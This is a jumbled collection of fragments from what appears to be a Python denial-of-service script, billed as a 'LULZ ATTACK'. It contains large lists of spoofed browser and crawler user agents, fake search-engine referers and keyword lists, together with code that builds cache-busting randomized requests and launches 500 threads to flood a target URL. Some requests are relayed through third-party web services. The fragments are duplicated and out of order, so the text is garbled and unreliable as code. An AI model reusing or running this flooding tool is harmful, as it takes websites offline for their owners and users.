273 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12 rev.", "headers_useragents.append('Anonymizer/1.1') headers_useragents.append('AnswerBus (http://www.answerbus.com/)') headers_useragents.append('AnswerChase PROve x.0') headers_useragents.append('AnswerChase x.0') headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)') headers_useragents.append('Apexoo", "(http://www.acoon.de and http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search Engine; acorn.isara.org; acorn at isara dot org)')", "headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By", "V2.0 AVS EVAL <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 Compaq Altavista Eval <EMAIL>') headers_useragents.append('AltaVista Intranet", "\\ /-._; | : : :: ,. . 
,' :: /`-._| | |", "Presto/2.5.22 Version/10.51') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial", "Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.2; en-us;", "Browser 3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com search engine", "PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/0.9.3) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/1.0.1)", "Android 4.2.1; Nexus 4 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;", "NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2;", "+ buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer',", "keyword_top.append('014 Sochi Winter Olympics') keyword_top.append('IPhone') keyword_top.append('Samsung Galaxy S5') keyword_top.append('Nexus 6') 
keyword_top.append('Moto G') keyword_top.append('Samsung", "rev. 260 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06 rev. 251 (http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3 (Macintosh; U; Intel Mac", "headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=')", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') # generates a referer array def referer_list():", "Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0') headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us)')", "headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search Engine; acorn.isara.org; acorn at isara dot org)') headers_useragents.append('ActiveBookmark 1.x') headers_useragents.append('Activeworlds')", "referer_list(): global headers_referers headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') 
headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('http://search.yahoo.com/search?p=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=')", "print '[+]~~>LULZ ATTACK STARTRD<~~[+] ' code=500 except urllib2.URLError, e: #print e.reason sys.exit() else:", "m = re.search('http\\://([^/]*)/?.*', url) host = m.group(1) for i in range(500): t =", "Nexus 10 Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android", "(Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20 rev. 
273 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12", "Gecko/20070619') headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610') headers_useragents.append('Minimo/0.016') headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119", "Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET", "keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('adidas') keyword_top.append('ask.fm') keyword_top.append('adele') keyword_top.append('5x nexus') keyword_top.append('espn') keyword_top.append('uggs') keyword_top.append('uber') keyword_top.append('american", "headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5') headers_useragents.append('W3C_Validator/1.432.2.22') headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10') headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1 libwww/5.4.1') headers_useragents.append('amaya/11.2", "headers_useragents.append('ProxiNet; Danger hiptop 1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)') headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5", "headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.4; en-us;') headers_useragents.append('Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.3.6;", "1.1 (www.autowebdir.com)') headers_useragents.append('AV Fetch 1.0') headers_useragents.append('Avant Browser 
(http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb') headers_useragents.append('axadine/", "4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android", "epicurus at gmail dot com)') headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x') headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0')", "Linux armv6l; rv 1.8.1.5pre) Gecko/20070619') headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3)", "| | : \\ `--. 
) /|-._: : | \\ \\ / /", "8512/R21.0 NF-Browser/3.3') headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille spider 0.1 alpha - http://www.annomille.it') headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized by", "headers_useragents.append('autoemailspider') headers_useragents.append('autohttp') headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)') headers_useragents.append('AV Fetch 1.0') headers_useragents.append('Avant Browser (http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites')", "(KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Android; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append(' Mozilla/5.0", "bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots) #builds random ascii string def", "_..-'''/ / | \\ \\ _|/| \\ /-./_ \\; \\ \\,;' \\ ,\\", "headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')", "(Linux; U; Android 4.0.3; fr-fr; MIDC41') headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30')", "Firefox/26.0 IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET", "out_str = '' for i in range(0, size): a = random.randint(65, 90) 
out_str", "Olympics') keyword_top.append('IPhone') keyword_top.append('Samsung Galaxy S5') keyword_top.append('Nexus 6') keyword_top.append('Moto G') keyword_top.append('Samsung Note 4') keyword_top.append('LG", "\\: `:\\ \\ // `:`. ,' \\ /-._; | : : :: ,.", "headers_useragents.append('A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24') headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT (Mozilla compatible)') headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja Checkomat", "headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com search engine - obeys robots.txt and", "Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)')", "random import re #global params url='' host='' headers_useragents=[] headers_referers=[] request_counter=0 flag=0 safe=0 def", "counts requests class MonitorThread(threading.Thread): def run(self): previous=request_counter while flag==0: if (previous+500<request_counter) & (previous<>request_counter):", "headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; a<EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; a<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants')", "headers_useragents.append('Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.3.6; en-us;') headers_useragents.append('VS840 4G 
Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1 (KHTML,", "headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0 (Linux;", "Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36') headers_useragents.append('Mozilla/5.0", "headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/2.0 (compatible; MSIE 3.02;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/5.0", "headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')", "Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append('Mozilla/5.0 (Linux; U; Android", "headers_useragents.append('W3C_Validator/1.432.2.5') headers_useragents.append('W3C_Validator/1.432.2.22') 
headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10') headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1 libwww/5.4.1') headers_useragents.append('amaya/11.2 libwww/5.4.0') headers_useragents.append('amaya/11.1 libwww/5.4.0')", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=')", "Nexus 7 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Android; Mobile; rv:18.0)", "headers_useragents.append('1st ZipCommander (Net) - http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64') headers_useragents.append('4anything.com LinkChecker v2.0') headers_useragents.append('8484 Boston Project", "(previous+500<request_counter) & (previous<>request_counter): print \"%d lULZ Up\" % (request_counter) previous=request_counter if flag==2: print", "inc_counter(): global request_counter request_counter+=1 def set_flag(val): global flag flag=val def set_safe(): global safe", "A Real artificial intelligence 
search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)')", "+ param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset',", "6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT", "urllib2.urlopen(request) except urllib2.HTTPError, e: #print e.code set_flag(1) print '[+]~>LULZ ATTACK STARTRD<~' print '[+]~~>LULZ", "a referer array def referer_list(): global headers_referers headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=')", "bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots) #builds random ascii", "MetaCrawler v.0.9.7c (http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20 rev. 273 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12 rev. 
260 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06 rev.", "RTM)') headers_useragents.append('Allesklar/0.1 libwww-perl/5.46') headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)') headers_useragents.append('Allrati/1.1 (+)') headers_useragents.append('AltaVista Intranet V2.0 AVS EVAL", "# generates a referer array def referer_list(): global headers_referers headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.google.com/?q=')", "headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows", "if flag==2: print \"\\n -lULZ Finish\" #execute if len(sys.argv) < 2: usage() sys.exit()", "headers_useragents.append('123spider-Bot (Version: 1.02) powered by www.123spider.de') headers_useragents.append('192.comAgent') headers_useragents.append('1st ZipCommander (Net) - http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0", "(KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en;", "headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)') headers_useragents.append('Apexoo Spider 1.x') headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie", "headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5') 
headers_useragents.append('W3C_Validator/1.432.2.22') headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10') headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1 libwww/5.4.1')", "engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; a<EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; a<EMAIL>)')", "like Gecko) Chrome/37.0.2049.0 Safari/537.36') # generates a referer array def referer_list(): global headers_referers", "= '' for i in range(0, size): a = random.randint(65, 90) out_str +=", "Hybridsuchmaschine (Germany)') headers_useragents.append('abot/0.1 (abot; http://www.abot.com; <EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech RSSCrawler/0.4') headers_useragents.append('accoona Accoona Search robot')", "usage() sys.exit() else: if sys.argv[1]==\"help\": usage() sys.exit() else: print \"Script Priv8 Privada da", "param_joiner=\"&\" else: param_joiner=\"?\" request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' +", ".NET CLR 3.5.30729; .NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2;", "Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1", "headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5') headers_useragents.append('W3C_Validator/1.432.2.22') headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10') headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1 
libwww/5.4.1') headers_useragents.append('amaya/11.2 libwww/5.4.0') headers_useragents.append('amaya/11.1", "Gecko) Chrome/37.0.2062.124 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)", "headers_referers headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('http://search.yahoo.com/search?p=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')", "libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial intelligence search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)')", "4.0.x.[xx] (http://www.acoon.de)') headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de and http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search Engine; acorn.isara.org; acorn", "(KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)')", "'=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))", "AvantGo 3.2)') headers_useragents.append(' 
Mozilla/5.0 (compatible; AvantGo 3.2;') headers_useragents.append('ProxiNet; Danger hiptop 1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google", "headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7", "headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36')", "(compatible; MSIE 5.0; PalmOS) PLink 2.56b') headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0; like Gecko) NetFront/3.5') headers_useragents.append('Mozilla/4.08", "_... Lulz ,'/ ;|/..--'' \\ Boat ,'_/.-/': : _..-'''/ / | \\ \\", "Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT", "Android 4.2.1; Galaxy Nexus Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0", "NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3;", "(KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.2; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19 (KHTML,", "flag=0 safe=0 def inc_counter(): global request_counter request_counter+=1 def set_flag(val): global flag flag=val def", "Presto/2.5.22 Version/10.51') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko)", "Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-au; GT-N5100 Build/JZO54K)') 
headers_useragents.append('CSSCheck/1.2.2')", "CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET", ",' :: /`-._| | | || ' : `.`.) _,' |;._:: | |", "headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('http://search.yahoo.com/search?p=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=')", "|;._:: | | | | `| : `' ,' `. / |`-:_ ;", "headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA;", "http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search Engine; acorn.isara.org; acorn at isara dot org)') headers_useragents.append('ActiveBookmark 1.x')", "260 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06 rev. 
251 (http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS", "headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like", "http://www.axada.de/; )') headers_useragents.append('AxmoRobot - Crawling your site for better indexing on www.axmo.com search", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') # generates a Keyword list def keyword_list(): global keyword_top", "CE; PPC; 240x320)') headers_useragents.append('Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619') headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0", "rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like", "BB Navigator 1.0) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54", "if len(sys.argv) < 2: usage() sys.exit() else: if sys.argv[1]==\"help\": usage() sys.exit() else: print", "keyword_top.append('Xbox One') keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('Ecosistema')", "(Android; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 4 Build/JOP40D)", "e: #print e.reason sys.exit() else: inc_counter() urllib2.urlopen(request) return(code) #http caller thread class 
